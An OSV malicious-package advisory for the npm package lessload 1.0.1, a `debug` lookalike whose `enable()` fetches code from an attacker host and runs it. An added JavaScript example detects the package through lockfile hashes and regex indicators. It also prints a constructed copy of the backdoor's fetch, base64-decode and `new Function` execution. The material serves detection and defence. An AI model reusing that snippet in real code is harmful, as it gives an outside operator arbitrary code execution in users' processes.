{"id":"MAL-2026-6579","summary":"Malicious code in lessload (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (9a5401aaa39f6562549f4fa8298e5bcee579987b837d2440565c37a8f5182dc6)\nlessload@1.0.1 impersonates the popular `debug` package (replicating its API surface, contributor list, and description as a 'Lightweight debugging utility') and embeds a backdoor inside the exported `enable()` function in src/common.js. When a consumer calls `debug.enable(namespaces)`, the package issues an outbound HTTPS request to the hardcoded endpoint `https://fundraiser-success.vercel.app/api/debugCheck?id=\u003cnamespaces\u003e`, base64-decodes the `message` field of the response, and executes it via `new Function('require', decoded)(require)`, granting the operator of that endpoint arbitrary code execution with full `require` access inside the consumer's Node.js process. The same request leaks the caller-supplied namespace argument to the attacker-controlled host. The malicious block is wrapped in cover-story comments labelling it 'DEBUG-ONLY: Remote code execution for debugging purposes' to disguise the backdoor as a legitimate debug feature. Because the package is positioned as a drop-in `debug` lookalike, any consumer that uses it with `debug` semantics triggers the remote code execution on its first `enable()` call.\n","modified":"2026-06-29T07:16:41.639387442Z","published":"2026-06-29T05:32:36Z","database_specific":{"malicious-packages-origins":[{"import_time":"2026-06-29T07:09:09.513724392Z","sha256":"9a5401aaa39f6562549f4fa8298e5bcee579987b837d2440565c37a8f5182dc6","versions":["1.0.1"],"modified_time":"2026-06-29T05:32:36Z","id":"IN-MAL-2026-007744","ranges":[{"events":[{"introduced":"0"}],"type":"SEMVER"}],"source":"amazon-inspector"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/lessload/v/1.0.1"}],"affected":[{"package":{"name":"lessload","ecosystem":"npm","purl":"pkg:npm/lessload"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"}]}],"versions":["1.0.1"],"database_specific":{"cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}],"indicators":{"evidence_files":[{"tlsh":"35425048a4f334528777a07ec71f7442e23a81272a44ca5678ce435c6f96a3442effe6","sha256":"16527ff1117b8744a52b939fd4b384361f9110305642d5892964aef53cf66a59","path":"src/common.js"},{"tlsh":"af41bba2cc6c4d730fca649569ad1402b6229d83cd84fd1e7366425ecf4c16f21fdaad","sha256":"d814137fc577b63aa2cb6c7663b202a93e9b63a9407e437e7ccdef946f382c98","path":"package.json"}],"package_integrity":[{"filename":"lessload-1.0.1.tgz","hashes":{"sha512_sri":"sha512-igjuWhvNAFTQomAB9BwqMGhatbX6ihwppOXR+WAugBxg9koEVfUJJcaL6FT1EnfUQ3pxDC8OvCOygdgkTNx3cA==","sha1":"346c37f113e647fc2ff0d7b4d2c52819649b3656"}}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/lessload/MAL-2026-6579.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}
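The advisory describes the backdoor in enough detail to turn it into two offline checks: a lockfile check keyed on the package name, version and published tarball SRI hash, and a source scan for the indicators in the `enable()` backdoor (the hardcoded C2 host and path, the base64 decode of the response, the `new Function('require', ...)` evaluation, and the cover-story comment). The following is an added example written for this page, not code from the advisory, Amazon Inspector, or the lessload package; the indicator values come from the advisory text, while the function names, regexes and the sample lockfile and source fragments are constructed for illustration and do not claim to reproduce the package's actual file.

```javascript
// Added example (not from the advisory or the lessload package). Two offline
// checks a consumer can run against a lockfile and a dependency's source.
// Indicator values are taken from the advisory; the function names, regexes
// and sample inputs below are constructed for illustration.

// Package identity and tarball integrity hash as published in the advisory.
const KNOWN_BAD = {
  name: 'lessload',
  versions: ['1.0.1'],
  sha512_sri: 'sha512-igjuWhvNAFTQomAB9BwqMGhatbX6ihwppOXR+WAugBxg9koEVfUJJcaL6FT1EnfUQ3pxDC8OvCOygdgkTNx3cA==',
};

// Source-level indicators of the enable() backdoor the advisory describes.
// Regexes tolerate whitespace and quoting differences so a reformatted copy
// of the same code is still caught.
const SOURCE_INDICATORS = [
  { id: 'c2-host', re: /fundraiser-success\.vercel\.app/ },
  { id: 'c2-path', re: /\/api\/debugCheck/ },
  { id: 'base64-decode', re: /Buffer\.from\([\s\S]*?['"]base64['"]\s*\)/ },
  { id: 'dynamic-eval', re: /new\s+Function\s*\(\s*['"]require['"]/ },
  { id: 'cover-story', re: /DEBUG-ONLY: Remote code execution/ },
];

// Walk a package-lock.json (lockfileVersion 2/3 "packages" map) and report
// every entry that is the flagged name/version OR carries the flagged tarball
// hash. Matching on the hash as well catches the same tarball republished
// under another version number or name.
function checkLockfile(lock) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === '') continue; // root project entry, not a dependency
    const marker = 'node_modules/';
    const name = entry.name || path.slice(path.lastIndexOf(marker) + marker.length);
    const byVersion = name === KNOWN_BAD.name && KNOWN_BAD.versions.includes(entry.version);
    const byHash = entry.integrity === KNOWN_BAD.sha512_sri;
    if (byVersion || byHash) {
      findings.push({ path, name, version: entry.version, byVersion, byHash });
    }
  }
  return findings;
}

// Scan a JavaScript source string and return the ids of the indicators it
// matches, in the order they are listed above. 'dynamic-eval' together with
// a network indicator is a strong signal; 'base64-decode' alone is common in
// benign code and should not be treated as a finding by itself.
function scanSource(src) {
  return SOURCE_INDICATORS.filter(({ re }) => re.test(src)).map(({ id }) => id);
}

// Constructed lockfile fragment: a project that pulled in the flagged version.
const SAMPLE_LOCK = {
  name: 'demo-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '1.0.0', dependencies: { lessload: '^1.0.1' } },
    'node_modules/lessload': {
      version: '1.0.1',
      resolved: 'https://registry.npmjs.org/lessload/-/lessload-1.0.1.tgz',
      integrity: KNOWN_BAD.sha512_sri,
    },
    'node_modules/ms': { version: '2.1.3', integrity: 'sha512-constructedBenignHash' },
  },
};

// Constructed source fragment that mirrors the backdoor shape the advisory
// describes (C2 request, base64 decode of `message`, new Function with
// require). It is illustrative text held in a string and never executed.
const SAMPLE_SOURCE = `
function enable(namespaces) {
  // DEBUG-ONLY: Remote code execution for debugging purposes
  https.get('https://fundraiser-success.vercel.app/api/debugCheck?id=' + namespaces, (res) => {
    let body = '';
    res.on('data', (c) => (body += c));
    res.on('end', () => {
      const decoded = Buffer.from(JSON.parse(body).message, 'base64').toString();
      new Function('require', decoded)(require);
    });
  });
}
`;

// Constructed benign control: an enable() that only parses namespaces.
const BENIGN_SOURCE = `
function enable(namespaces) {
  createDebug.names = String(namespaces || '').split(/[\\s,]+/);
}
`;

console.log('lockfile findings:', checkLockfile(SAMPLE_LOCK));
console.log('backdoor indicators:', scanSource(SAMPLE_SOURCE));
console.log('benign indicators:', scanSource(BENIGN_SOURCE));
```

To use this against a real project, read `package-lock.json` with `JSON.parse(fs.readFileSync(...))` and pass it to `checkLockfile`, and feed `scanSource` the contents of each `.js` file under `node_modules/lessload`. A hit from `checkLockfile` is definitive on its own, since it is keyed on the advisory's name, version and SRI hash; `scanSource` is the secondary check for copies of the same code that were republished under a different name or hash.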